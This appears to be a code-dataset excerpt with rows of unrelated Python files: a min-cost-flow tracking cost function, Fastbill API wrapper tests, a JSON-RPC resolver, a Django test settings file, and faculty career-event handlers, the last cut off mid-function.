repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
alanaberdeen/coupled-minimum-cost-flow-track | cmcft/tools/params/c_cost.py | 1 | 2405 | # c_cost.py
# Cost vector for edges in coupled matrix
import numpy as np
__all__ = ["c_cost"]
def c_cost(g, a_coup, a_vertices):
# TODO: think this function is slow. Check for performance increases.
# c_cost
# creates vector of costs for edges
#
# Inputs: g - graph structure
# a_coup - coupled incidence matrix
# a_vertices - order of rows in coupled matrix
#
# Outputs: c - list of costs for each edge in incidence matrix
#
# Initialise cost vector
c = []
# For all edges in coupled matrix (iterating over transpose)
for e in a_coup.T:
# Get vertices connected by edge
vertex_indices = np.nonzero(e)
v = [a_vertices[i] for i in vertex_indices[1]]
# Get weights
cost = 0
# For simple edges
if len(v) == 2:
try:
cost = g[v[0]][v[1]]['weight']
except KeyError:
cost = g[v[1]][v[0]]['weight']
# For coupled edges
elif len(v) == 4:
# Find merge/split event label
ms_node = ms_event(v, g)
for n in v:
try:
cost = cost + g.edge[n][ms_node]['weight']
except KeyError:
cost = cost + g.edge[ms_node][n]['weight']
# Append to cost vector
c.append(cost)
return c
def ms_event(vertices, graph):
# ms_event
# given 4 nodes find the split or merge vertex that they are connected to
#
# Inputs: vertices - list of 4 node labels
# graph - graph structure
# Outputs: event_label - label of split/merge node
#
# initialise_out set
num = []
event = None
# split nodes
if 'D' in vertices:
event = 'M'
for n in vertices:
if 'L' in n:
num.append(''.join(i for i in n if i.isdigit()))
# merge nodes
elif 'A' in vertices:
event = 'S'
for n in vertices:
if 'R' in n:
num.append(''.join(i for i in n if i.isdigit()))
# Combine to give event label
event_label = (event + '(' + num[0] + ',' + num[1] + ')')
# Check if correct way around
if not graph.has_node(event_label):
event_label = (event + '(' + num[1] + ',' + num[0] + ')')
return event_label
| mit | -3,617,845,052,523,256,300 | 23.540816 | 77 | 0.50894 | false |
stylight/python-fastbill | tests/test_api.py | 1 | 6430 | #!/usr/bin/env python
# encoding: utf-8
import datetime
import decimal
import httpretty
import json
import unittest
# Set the endpoint to http because some library combination
# leads to a SSLError when running the test with httpretty.
api_endpoint = "http://automatic.fastbill.com/api/1.0/api.php"
api_email = "[email protected]"
api_key = "4"
RESPONSE_DATA = {
'SUBSCRIPTIONS': [
{
'SUBSCRIPTION': {
'SUBSCRIPTION_ID': '1101',
'CUSTOMER_ID': '296526',
'START': '2013-05-24 13:50:33',
'NEXT_EVENT': '2013-06-24 13:50:33',
'CANCELLATION_DATE': '2013-06-24 13:50:33',
'STATUS': 'canceled',
'ARTICLE_NUMBER': '1',
'SUBSCRIPTION_EXT_UID': '',
'LAST_EVENT': '2013-05-24 13:50:33',
}
}
]
}
class JsonTest(unittest.TestCase):
def test_json_encoder(self):
import fastbill
json_dump = json.dumps({
'date': datetime.date(2016, 6, 2),
'datetime': datetime.datetime(2015, 5, 1, 14, 42, 17),
'money': decimal.Decimal("17.23"),
}, cls=fastbill.jsonencoder.CustomJsonEncoder)
self.assertEqual(
json.loads(json_dump),
{'date': '2016-06-02',
'money': '17.23',
'datetime': '2015-05-01 14:42:17'}
)
class TestWrapper(unittest.TestCase):
TESTCASES = {
'customer.get': [
({'country_code': 'at'}, 200, {'CUSTOMERS': []}),
({'country_code': 'de'}, 200, {'CUSTOMERS': [{'NAME': 'Hans'}]}),
],
'getnewargs': [
({}, 400, {u'ERRORS': [u'unknown SERVICE: getnewargs',
u'unknown SERVICE: ']}),
],
'subscription.get': [
({}, 200, {}),
],
'subscription.setusagedata': [
(
{
'USAGE_DATE': datetime.datetime(2015, 5, 1),
'UNIT_PRICE': decimal.Decimal('17.23'),
'CURRENCY_CODE': u'EUR',
},
200,
{}
),
],
}
def test_response(self):
import fastbill
response = RESPONSE_DATA
class FakeAPI(object):
def subscription_get(self, filter=None):
return fastbill.response.FastbillResponse(response, self)
resp = fastbill.response.FastbillResponse(response, FakeAPI())
self.assertEqual(response,
resp.subscriptions[0].subscription.subscription)
self.assertRaises(AttributeError, getattr, resp, 'blah')
resp_iter = iter(resp)
self.assertEqual(next(resp_iter),
response['SUBSCRIPTIONS'][0])
self.assertRaises(StopIteration, next, resp_iter)
@httpretty.activate
def test_wrapper(self):
import fastbill
from mock import Mock
mock = Mock()
class ResponseLookAlike(object):
def __init__(self, status_code):
self.status_code = status_code
def __eq__(self, other):
return self.status_code == other.status_code
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
pre_request=mock.pre_request,
post_request=mock.post_request)
for method_name, calls in self.TESTCASES.items():
attribute_name = method_name.replace(".", "_")
try:
method = getattr(api, attribute_name)
except AttributeError:
if not attribute_name.startswith("_"):
raise
for (filter_by, http_code, response) in calls:
def request_callback(method, _, headers,
method_name=method_name,
http_code=http_code,
response=response):
request = json.loads(method.body.decode('utf8'))
request['SERVICE'] = method_name
return (http_code, headers, json.dumps({
'RESPONSE': response,
'REQUEST': request,
}, cls=fastbill.jsonencoder.CustomJsonEncoder))
httpretty.register_uri(httpretty.POST,
api.SERVICE_URL,
body=request_callback)
params = {'filter': filter_by}
if http_code == 200:
result = method(**params)
self.assertEqual(result, response)
else:
self.assertRaises(fastbill.exceptions.FastbillResponseError,
method, **params)
# The actual payload will look like this.
payload = params.copy()
payload.update({
'service': method_name,
'limit': None,
'offset': None,
'data': None
})
mock.pre_request.assert_called_with(
method_name,
payload
)
mock.post_request.assert_called_with(
method_name,
payload,
ResponseLookAlike(http_code)
)
def test_pickle(self):
import pickle
import fastbill
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
name="blah")
response = fastbill.response.FastbillResponse(RESPONSE_DATA, api)
pickled_response = pickle.dumps(response)
unpickled_response = pickle.loads(pickled_response)
self.assertTrue(unpickled_response.api is None)
self.assertEqual(
unpickled_response.subscriptions[0].subscription.article_number,
'1')
self.assertRaises(
KeyError,
lambda: unpickled_response.subscriptions[0].subscription.customer)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-vv', '--with-doctest'])
| mit | 5,063,697,128,748,161,000 | 32.489583 | 80 | 0.487092 | false |
steffgrez/fast-jsonrpc2 | fast_jsonrpc2/resolver.py | 1 | 2183 | """
from fast_jsonrpc import JSONRPCResolver
def foo(msg)
return 'foobar ' + str(msg)
router = {'foo': foo}
resolver = JSONRPCResolver(router)
json_request = {"jsonrpc": "2.0", "method": "foo", "params": ["toto"], "id": 1}
json_response = resolver.handle(json_request)
print json_response
-> {"jsonrpc": "2.0", "result": "foobar toto", "id": 1}
"""
import json
from fast_jsonrpc2.request import RequestHandler
from fast_jsonrpc2.response import ResponseHandler
class JSONRPCResolver(object):
__slots__ = [
'serializer',
'response_handler',
'request_handler'
]
def __init__(
self,
router,
lazy_check=False,
error_verbose=True,
serializer=json
):
self.serializer = serializer
self.response_handler = ResponseHandler(error_verbose)
self.request_handler = RequestHandler(
self.response_handler, router, lazy_check
)
def handle(self, str_request):
response = None
try:
# handle encoding
if isinstance(str_request, bytes):
str_request = str_request.decode("utf-8")
# get response from unserialized request
try:
request = self.serializer.loads(str_request)
except (TypeError, ValueError):
response = self.response_handler.get_parse_error_response(
data='Bad formatted json'
)
else:
if not request:
response = self.response_handler \
.get_invalid_request_response(
data='Empty request is not allowed'
)
else:
response = self.request_handler.get_response(request)
except Exception as e:
# handle unexpected exception
response = self.response_handler.get_internal_error_response(
data=e.args[0]
)
# return serialized result
return self.serializer.dumps(response) if response else ''
class JSONRPCException(Exception):
pass
| mit | 4,663,643,689,105,370,000 | 26.2875 | 79 | 0.558406 | false |
ninemoreminutes/django-datatables | test_project/settings.py | 1 | 2955 | # Python
import os
import sys
# Django
from django.conf import global_settings
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Absolute path to the directory containing this Django project.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'test_project.sqlite3'),
}
}
SITE_ID = 1
STATIC_URL = '/static/'
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'devserver.middleware.DevServerMiddleware',
)
TEMPLATE_DIRS = (
#os.path.join(PROJECT_ROOT, 'templates'),
)
ROOT_URLCONF = 'test_project.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'debug_toolbar',
'devserver',
'django_extensions',
'south',
'sortedm2m',
'fortunecookie',
'datatables',
'test_app',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
#'INTERCEPT_REDIRECTS': False,
}
DEVSERVER_DEFAULT_ADDR = '127.0.0.1'
DEVSERVER_DEFAULT_PORT = '8044'
DEVSERVER_MODULES = (
# SQLRealTimeModule is broken with Django 1.6.
#'devserver.modules.sql.SQLRealTimeModule',
'devserver.modules.sql.SQLSummaryModule',
'devserver.modules.profile.ProfileSummaryModule',
# Modules not enabled by default
#'devserver.modules.ajax.AjaxDumpModule',
#'devserver.modules.profile.MemoryUseModule',
#'devserver.modules.cache.CacheSummaryModule',
#'devserver.modules.profile.LineProfilerModule',
)
SECRET_KEY = 'gkwl+r%+^4==^(dnnkv8o#&h&bn=x43*k$h7_e7p+l0w&eba)m'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
}
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
},
'null': {
'class': 'django.utils.log.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'py.warnings': {
'handlers': ['console'],
},
'datatables': {
'handlers': ['console'],
}
}
}
| bsd-3-clause | 7,971,362,363,779,574,000 | 23.221311 | 72 | 0.598308 | false |
sfu-fas/coursys | faculty/event_types/career.py | 1 | 27177 | import fractions
import itertools
from django import forms
from django.utils.safestring import mark_safe
from django.http import HttpResponse
from faculty.event_types import fields, search
from faculty.event_types.base import BaseEntryForm
from faculty.event_types.base import CareerEventHandlerBase
from faculty.event_types.choices import Choices
from faculty.event_types.base import SalaryAdjust, TeachingAdjust
from faculty.event_types.mixins import TeachingCareerEvent, SalaryCareerEvent
from faculty.event_types.constants import SALARY_STEPS_CHOICES
from dashboard.letters import yellow_form_limited, yellow_form_tenure
RANK_CHOICES = Choices(
('LLEC', 'Limited-Term Lecturer'),
('LABI', 'Laboratory Instructor'),
('LECT', 'Lecturer'),
('SLEC', 'Senior Lecturer'),
('INST', 'Instructor'),
('ASSI', 'Assistant Professor'),
('ASSO', 'Associate Professor'),
('FULL', 'Full Professor'),
('URAS', 'University Research Associate'),
('ADJC', 'Adjunct Professor'),
('POPP', 'Professor of Professional Practice'),
#('UNIV', 'University Professor'),
#('UNIR', 'University Research Professor'),
)
CONTRACT_REVIEW_CHOICES = Choices(
('PEND', 'Pending'),
('PROM', 'Renewed'),
('DENY', 'Denied'),
)
class AppointmentEventHandler(CareerEventHandlerBase):
"""
The big career event: from hiring to leaving the position.
"""
EVENT_TYPE = 'APPOINT'
NAME = 'Appointment to Position'
IS_EXCLUSIVE = True
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Position Number</dt><dd>{{ handler|get_display:"position_number" }}</dd>
<dt>Leaving Reason</dt><dd>{{ handler|get_display:"leaving_reason" }}</dd>
<dt>Spousal Hire</dt><dd>{{ handler|get_display:"spousal_hire"|yesno }}</dd>
{% if handler|get_config:"degree1" != 'unknown' and handler|get_config:"degree1" != ''%}
<dt>Degrees Held</dt>
<dd>{{ handler|get_display:"degree1" }}, {{ handler|get_display:"year1" }},
{{ handler|get_display:"institution1" }}, {{ handler|get_display:"location1" }}
{% if handler|get_config:"degree2" != 'unknown' and handler|get_config:"degree2" != ''%}<br>
<dd>{{ handler|get_display:"degree2" }}, {{ handler|get_display:"year2" }},
{{ handler|get_display:"institution2" }}, {{ handler|get_display:"location2" }}{% endif %}
{% if handler|get_config:"degree3" != 'unknown' and handler|get_config:"degree3" != '' %}<br>
<dd>{{ handler|get_display:"degree3" }}, {{ handler|get_display:"year3" }},
{{ handler|get_display:"institution3" }}, {{ handler|get_display:"location3" }}{% endif %}
{% endif %}
{% if handler|get_config:"teaching_semester_credits" != 'unknown' and handler|get_config:"teaching_semester_credits" != ''%}
<dt>Teaching Semester Credits</dt><dd>{{ handler|get_config:"teaching_semester_credits" }}</dd>
{% endif %}
{% endblock %}
"""
PDFS = {'yellow1': 'Yellow Form for Tenure Track',
'yellow2': 'Yellow Form for Limited Term'}
class EntryForm(BaseEntryForm):
LEAVING_CHOICES = Choices(
('HERE', '\u2014'), # hasn't left yet
('RETI', 'Retired'),
('END', 'Limited-term contract ended'),
('UNIV', 'Left: job at another University'),
('PRIV', 'Left: private-sector job'),
('GONE', 'Left: employment status unknown'),
('FIRE', 'Dismissal'),
('DIED', 'Deceased'),
('OTHR', 'Other/Unknown'),
)
position_number = forms.CharField(initial='', required=False, widget=forms.TextInput(attrs={'size': '6'}))
spousal_hire = forms.BooleanField(initial=False, required=False)
leaving_reason = forms.ChoiceField(initial='HERE', choices=LEAVING_CHOICES)
degree1 = forms.CharField(max_length=12, help_text='These are the degrees to be inserted into the '
'Recommendation for Appointment Forms (AKA "Yellow Form"). '
' List the highest degree first.', required=False,
label='Degree 1', widget=forms.TextInput(attrs={'size': '13'}))
year1 = forms.CharField(max_length=5, required=False, label='Year 1', widget=forms.TextInput(attrs={'size': '5'}))
institution1 = forms.CharField(max_length=25, required=False, label='Institution 1')
location1 = forms.CharField(max_length=23, required=False, label='City/Country 1')
degree2 = forms.CharField(max_length=12, required=False, label='Degree 2',
widget=forms.TextInput(attrs={'size': '13'}))
year2 = forms.CharField(max_length=5, required=False, label='Year 2', widget=forms.TextInput(attrs={'size': '5'}))
institution2 = forms.CharField(max_length=25, required=False, label='Institution 2')
location2 = forms.CharField(max_length=23, required=False, label='City/Country 2')
degree3 = forms.CharField(max_length=12, required=False, label='Degree 3',
widget=forms.TextInput(attrs={'size': '13'}))
year3 = forms.CharField(max_length=5, required=False, label='Year 3', widget=forms.TextInput(attrs={'size': '5'}))
institution3 = forms.CharField(max_length=25, required=False, label='Institution 3')
location3 = forms.CharField(max_length=23, required=False, label='City/Country 3')
teaching_semester_credits = forms.DecimalField(max_digits=3, decimal_places=0, required=False,
help_text='Number of teaching semester credits, for the tenure '
'track form')
SEARCH_RULES = {
'position_number': search.StringSearchRule,
'spousal_hire': search.BooleanSearchRule,
'leaving_reason': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'position_number',
'spousal_hire',
'leaving_reason',
]
def get_leaving_reason_display(self):
return self.EntryForm.LEAVING_CHOICES.get(self.get_config('leaving_reason'), 'N/A')
def short_summary(self):
return "Appointment to position"
def generate_pdf(self, key):
response = HttpResponse(content_type="application/pdf")
response['Content-Disposition'] = 'inline; filename="yellowform.pdf"'
if key == 'yellow1':
yellow_form_tenure(self, response)
return response
if key == 'yellow2':
yellow_form_limited(self, response)
return response
class SalaryBaseEventHandler(CareerEventHandlerBase, SalaryCareerEvent):
"""
An annual salary update
"""
EVENT_TYPE = 'SALARY'
NAME = "Base Salary Update"
IS_EXCLUSIVE = True
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% load humanize %}{% block dl %}
<dt>Rank & Step</dt><dd>{{ handler|get_display:"rank" }}, step {{ handler|get_display:"step" }}</dd>
<dt>Base salary</dt><dd>${{ handler|get_display:"base_salary"|floatformat:2|intcomma}}</dd>
<dt>Market Differential</dt><dd>${{ handler|get_display:"add_salary"|floatformat:2|intcomma }}</dd>
<dt>Add pay</dt><dd>${{ handler|get_display:"add_pay"|floatformat:2|intcomma }}</dd>
<dt>Total</dt><dd>${{ total|floatformat:2|intcomma }}</dd>
<!--<dt>Biweekly</dt><dd>${{ biweekly|floatformat:2 }}</dd>-->
{% endblock %}
"""
class EntryForm(BaseEntryForm):
rank = forms.ChoiceField(choices=RANK_CHOICES, required=True)
step = forms.DecimalField(max_digits=4, decimal_places=2,
help_text="Current salary step")
base_salary = fields.AddSalaryField(help_text="Base annual salary for this rank + step.")
add_salary = fields.AddSalaryField(label="Market Differential")
add_pay = fields.AddPayField()
def post_init(self):
# find the last-known rank as a default
if self.person:
from faculty.models import CareerEvent
event = CareerEvent.objects.filter(person=self.person, event_type='SALARY').effective_now().last()
if event:
self.fields['rank'].initial = event.config['rank']
SEARCH_RULES = {
'rank': search.ChoiceSearchRule,
'base_salary': search.ComparableSearchRule,
'step': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'rank',
'base_salary',
'step',
]
def to_html_context(self):
total = self.get_config('base_salary')
total += self.get_config('add_salary')
total += self.get_config('add_pay')
return {
'total': total,
'biweekly': total/365*14,
}
def get_rank_display(self):
return RANK_CHOICES.get(self.get_config('rank'), 'Unknown Rank')
@classmethod
def default_title(cls):
return 'Base Salary'
def short_summary(self):
return "{2} step {1} at ${0}".format(self.get_config('base_salary'),
self.get_config('step'), self.get_rank_display())
def salary_adjust_annually(self):
salary = self.get_config('base_salary')
add_salary = self.get_config('add_salary')
add_pay = self.get_config('add_pay')
return SalaryAdjust(salary + add_salary, 1, add_pay)
class SalaryModificationEventHandler(CareerEventHandlerBase, SalaryCareerEvent):
"""
Salary modification/stipend event
"""
EVENT_TYPE = 'STIPEND'
NAME = "Salary Modification/Stipend"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Source</dt><dd>{{ handler|get_display:"source" }}</dd>
<dt>Amount</dt><dd>${{ handler|get_display:"amount" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
STIPEND_SOURCES = Choices(
('RETENTION', 'Retention Award'),
('MARKETDIFF', 'Market Differential'),
('RESEARCH', 'Research Chair Stipend'),
('OTHER', 'Other'),
)
source = forms.ChoiceField(label='Stipend Source', choices=STIPEND_SOURCES)
# Do we want this to be adjusted during leaves?
amount = fields.AddSalaryField()
SEARCH_RULES = {
'source': search.ChoiceSearchRule,
'amount': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'source',
'amount',
]
def get_source_display(self):
return self.EntryForm.STIPEND_SOURCES.get(self.get_config('source'), 'N/A')
@classmethod
def default_title(cls):
return 'Salary Modification / Stipend'
def short_summary(self):
return "{0}: ${1}".format(self.get_source_display(),
self.get_config('amount'))
def salary_adjust_annually(self):
amount = self.get_config('amount')
return SalaryAdjust(amount, 1, 0)
class TenureApplicationEventHandler(CareerEventHandlerBase):
"""
Tenure Application Career event
"""
EVENT_TYPE = 'TENUREAPP'
NAME = "Tenure Application"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Result</dt><dd>{{ handler|get_display:"result" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
RESULT_CHOICES = Choices(
('PEND', 'Pending'),
('RECI', 'Tenured'),
('DENI', 'Denied'),
)
result = forms.ChoiceField(label='Result', choices=RESULT_CHOICES,
help_text='The end date of this event is assumed to be when this decision is effective.')
SEARCH_RULES = {
'result': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
]
def get_result_display(self):
return self.EntryForm.RESULT_CHOICES.get(self.get_config('result'), 'unknown outcome')
def short_summary(self):
return "Tenure application: {0}".format(self.get_result_display(),)
class PromotionApplicationEventHandler(CareerEventHandlerBase):
"""
Promotion Application Career event
"""
EVENT_TYPE = 'PROMOTION'
NAME = "Promotion Application"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Rank applied for</dt><dd>{{ handler|get_display:"rank" }}</dd>
<dt>Result</dt><dd>{{ handler|get_display:"result" }}</dd>
<dt>Steps Year One</dt><dd>{{ handler|get_display:"steps" }} <span class="helptext">(step increase in the first year after promotion)</span></dd>
<dt>Steps Year Two</dt><dd>{{ handler|get_display:"steps2" }} <span class="helptext">(step increase in the second year after promotion)</span></dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
RESULT_CHOICES = Choices(
('PEND', 'Pending'),
('RECI', 'Promoted'),
('DENI', 'Denied'),
)
rank = forms.ChoiceField(choices=RANK_CHOICES, required=True,
help_text='Rank being applied for (promoted to if successful)')
result = forms.ChoiceField(label='Result', choices=RESULT_CHOICES,
help_text='The end date of this event is assumed to be when this decision is effective.')
steps = forms.ChoiceField(label='Steps Year One', choices=SALARY_STEPS_CHOICES,
help_text=mark_safe('Annual step increase given for the <strong>first</strong> year after promotion'))
steps2 = forms.ChoiceField(label='Steps Year Two', choices=SALARY_STEPS_CHOICES,
help_text=mark_safe('Annual step increase given for the <strong>second</strong> year after promotion'))
SEARCH_RULES = {
'result': search.ChoiceSearchRule,
'steps': search.ComparableSearchRule,
'steps2': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
'steps',
'steps2',
]
SEARCH_FIELD_NAMES = {
'steps': 'Steps Year One',
'steps2': 'Steps Year Two',
}
def get_rank_display(self):
return RANK_CHOICES.get(self.get_config('rank'), 'unknown rank')
def get_result_display(self):
return self.EntryForm.RESULT_CHOICES.get(self.get_config('result'), 'unknown outcome')
def get_steps_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps'), 'unknown outcome')
def get_steps2_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps2'), 'unknown outcome')
def short_summary(self):
return "Promotion application: {0}".format(self.get_result_display(),)
class SalaryReviewEventHandler(CareerEventHandlerBase):
EVENT_TYPE = 'SALARYREV'
NAME = "Salary Review"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Steps Granted</dt><dd>{{ handler|get_display:"steps" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
steps = forms.ChoiceField(label='Steps', choices=SALARY_STEPS_CHOICES,
help_text='Annual step increase given')
SEARCH_RULES = {
'steps': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'steps',
]
def get_steps_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps'), 'unknown outcome')
def short_summary(self):
return "Salary Review: {0}".format(self.get_steps_display(),)
class OnLeaveEventHandler(CareerEventHandlerBase, SalaryCareerEvent, TeachingCareerEvent):
"""
Taking a sort of leave
"""
EVENT_TYPE = 'LEAVE'
NAME = "On Leave"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Leave Type</dt><dd>{{ handler|get_display:"reason" }}</dd>
<dt>Leave Fraction</dt><dd>{{ handler|get_display:"leave_fraction" }}</dd>
<dt>Teaching Credits</dt><dd>{{ handler|get_display:"teaching_credits" }}</dd>
<dt>Teaching Load Decrease</dt><dd>{{ handler|get_display:"teaching_load_decrease" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
REASONS = Choices(
('MEDICAL', 'Medical'),
('PARENTAL', 'Parental'),
('ADMIN', 'Admin'),
('LOA', 'Leave of Absence'),
('SECONDMENT', 'Secondment'),
)
reason = forms.ChoiceField(label='Type', choices=REASONS)
leave_fraction = fields.FractionField(help_text="Fraction of salary received during leave e.g. '3/4' indicates "
"75% pay. It can also be input as a decimal value, e.g. 0.75 "
"for 75%.",
label='Work fraction', initial=1)
teaching_credits = fields.TeachingCreditField()
teaching_load_decrease = fields.TeachingReductionField()
SEARCH_RULES = {
'reason': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'reason',
]
def get_reason_display(self):
return self.EntryForm.REASONS.get(self.get_config('reason'), 'N/A')
@classmethod
def default_title(cls):
return 'On Leave'
def short_summary(self):
try:
frac = fractions.Fraction(self.get_config('leave_fraction'))
except TypeError:
frac = 0
return '%s Leave @ %.0f%%' % (self.get_reason_display(), frac*100)
def salary_adjust_annually(self):
leave_fraction = self.get_config('leave_fraction')
return SalaryAdjust(0, leave_fraction, 0)
def teaching_adjust_per_semester(self):
credits = self.get_config('teaching_credits', 0)
load_decrease = self.get_config('teaching_load_decrease')
return TeachingAdjust(credits, load_decrease)
class StudyLeaveEventHandler(CareerEventHandlerBase, SalaryCareerEvent, TeachingCareerEvent):
"""
Study leave event
"""
EVENT_TYPE = 'STUDYLEAVE'
NAME = "Study Leave"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Option</dt><dd>{{ handler|get_display:"option" }} </dd>
<dt>Pay Fraction</dt><dd>{{ handler|get_display:"pay_fraction" }}</dd>
<dt>Report Received</dt><dd>{{ handler|get_display:"report_received"|yesno }}</dd>
<dt>Report Received On</dt><dd>{{ handler|get_display:"report_received_date" }}</dd>
<dt>Teaching Load Decrease</dt><dd>{{ handler|get_display:"teaching_decrease" }}</dd>
<dt>Deferred Salary</dt><dd>{{ handler|get_display:"deferred_salary"|yesno }}</dd>
<dt>Accumulated Credits</dt><dd>{{ handler|get_display:"accumulated_credits" }}</dd>
<dt>Study Leave Credits Spent</dt><dd>{{ handler|get_display:"study_leave_credits" }}</dd>
<dt>Study Leave Credits Carried Forward</dt><dd>{{ handler|get_display:"credits_forward" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
PAY_FRACTION_CHOICES = [
('4/5', '80%'),
('9/10', '90%'),
('1', '100%'),
]
option = forms.CharField(min_length=1, max_length=1, required=False,
help_text='The option for this study leave. A, B, C, etc',
widget=forms.TextInput(attrs={'size': '1'}))
pay_fraction = fields.FractionField(choices=PAY_FRACTION_CHOICES)
report_received = forms.BooleanField(label='Report Received?', initial=False, required=False)
report_received_date = fields.SemesterField(required=False, semester_start=False)
teaching_decrease = fields.TeachingReductionField()
deferred_salary = forms.BooleanField(label='Deferred Salary?', initial=False, required=False)
accumulated_credits = forms.IntegerField(label='Accumulated Credits', min_value=0, max_value=99,
help_text='Accumulated unused credits', required=False)
study_leave_credits = forms.IntegerField(label='Study Leave Credits Spent', min_value=0, max_value=99,
help_text='Total number of Study Leave Credits spent for entire leave')
credits_forward = forms.IntegerField(label='Study Leave Credits Carried Forward', required=False, min_value=0,
max_value=10000,
help_text='Study Credits Carried Forward After Leave (may be left blank if unknown)')
def post_init(self):
# finding the teaching load and set the decrease to that value
if (self.person):
from faculty.util import ReportingSemester
from faculty.processing import FacultySummary
semester = ReportingSemester(self.initial['start_date'])
teaching_load = abs(FacultySummary(self.person).teaching_credits(semester)[1])
else:
teaching_load = 0
self.fields['teaching_decrease'].initial = teaching_load
SEARCH_RULES = {
'pay_fraction': search.ComparableSearchRule,
'report_received': search.BooleanSearchRule,
'teaching_decrease': search.ComparableSearchRule,
'study_leave_credits': search.ComparableSearchRule,
'credits_forward': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'pay_fraction',
'report_received',
'report_received_date',
'teaching_decrease',
'study_leave_credits',
'credits_forward'
]
from django.conf.urls import url
EXTRA_LINKS = {'Teaching Summary': 'faculty:teaching_summary'}
@classmethod
def default_title(cls):
return 'Study Leave'
def get_pay_fraction_display(self):
try:
frac = fractions.Fraction(self.get_config('pay_fraction'))
except TypeError:
frac = 0
return '%.0f%%' % (frac*100)
def short_summary(self):
return 'Study Leave @ ' + self.get_pay_fraction_display()
def salary_adjust_annually(self):
pay_fraction = self.get_config('pay_fraction')
return SalaryAdjust(0, pay_fraction, 0)
def teaching_adjust_per_semester(self):
credits = self.get_config('teaching_decrease', 0)
return TeachingAdjust(fractions.Fraction(0), credits)
def get_credits_carried_forward(self):
return self.get_config('credits_forward')
def get_study_leave_credits(self):
return self.get_config('study_leave_credits')
class AccreditationFlagSearchRule(search.ChoiceSearchRule):
"""A hack to make viewer specific choice fields work."""
def make_value_field(self, viewer, member_units):
field = super(AccreditationFlagSearchRule, self).make_value_field(viewer, member_units)
from faculty.models import EventConfig
ecs = EventConfig.objects.filter(unit__in=member_units,
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
field.choices += itertools.chain(*[ec.config.get('flags', []) for ec in ecs])
return field
class AccreditationFlagEventHandler(CareerEventHandlerBase):
"""
Aquisition of a accreditation-related property
"""
EVENT_TYPE = 'ACCRED'
NAME = 'Accreditation Attribute'
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Attribute</dt><dd>{{ handler|get_display:"flag" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
flag = forms.ChoiceField(required=True, choices=[], label='Attribute')
def post_init(self):
# set the allowed position choices from the config from allowed units
from faculty.models import EventConfig
ecs = EventConfig.objects.filter(unit__in=self.units,
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
choices = itertools.chain(*[ec.config.get('flags', []) for ec in ecs])
self.fields['flag'].choices = choices
def clean(self):
from faculty.models import EventConfig
data = self.cleaned_data
if 'unit' not in data:
raise forms.ValidationError("Couldn't check unit for attribute ownership.")
